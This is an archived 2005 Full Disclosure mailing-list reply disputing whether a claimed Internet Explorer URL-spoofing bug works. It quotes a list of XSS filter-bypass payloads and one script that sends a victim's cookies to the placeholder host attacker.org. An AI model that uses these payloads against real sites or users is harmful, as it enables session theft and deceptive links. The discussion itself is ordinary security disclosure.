Full Disclosure mailing list archives
Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen).
From: Justin Allen <jallen () logicaldevelopments com au>
Date: Fri, 21 Oct 2005 09:08:43 +0800
Did you even test those URLs? The only thing that happens is a message box pops up, the status bar text also states that a message box will pop up. The only thing it does is change the tooltip on the link to google.com. -- Justin Allen Software Developer Logical Developments Phone: +61 8 9458 3889 Jerome Athias wrote:
You can then mix it with some classical XSS tricks like Basic XSS test detected: <a href="javascript:alert('XSS')" title="http://www.google.com">hello0</a> <a href="http://www.target.com/foo<script>document.location='http://www.attacker.org/?' +document.cookies</script>">Click here</a> Basic XSS test : <a href="JaVaScRiPt:alert('XSS')" title="http://www.google.com">hello0</a> UTF-8: <a href="javascript:alert('XSS')" title="http://www.google.com">hello</a> Long UTF-8 Unicode encoding without semicolons: <a href= javascript:alert('XSS') title="http://www.google.com" onMouseOver="pop('http://www.google.com');" onmouseout="kill()">hello</a> Embedded newline to break up XSS: <a href=jav
ascript:alert('XSS'); title="http://www.google.com" hover="http://www.google.com">hello2</a> Embedded carriage return to break up XSS (doesn't appear as link): <a href=jav
ascript:alert('XSS'); title="http://www.google.com" onmouseover="image(this.href);">hello3</a> Inserting spaces in href link: <a href=" javascript:alert('XSS');" title="http://www.google.com">hello4</a> etc... some bypass the Opera anti-illegal-urls
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). K-Gen Gen (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Mike Camden (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Jerome Athias (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Justin Allen (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Raoul Nakhmanson-Kulish (Oct 20)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Raoul Nakhmanson-Kulish (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Nick FitzGerald (Oct 21)
- Re: New (19.10.05) MS-IE Url Spoofing bug (by K-Gen). Mike Camden (Oct 20)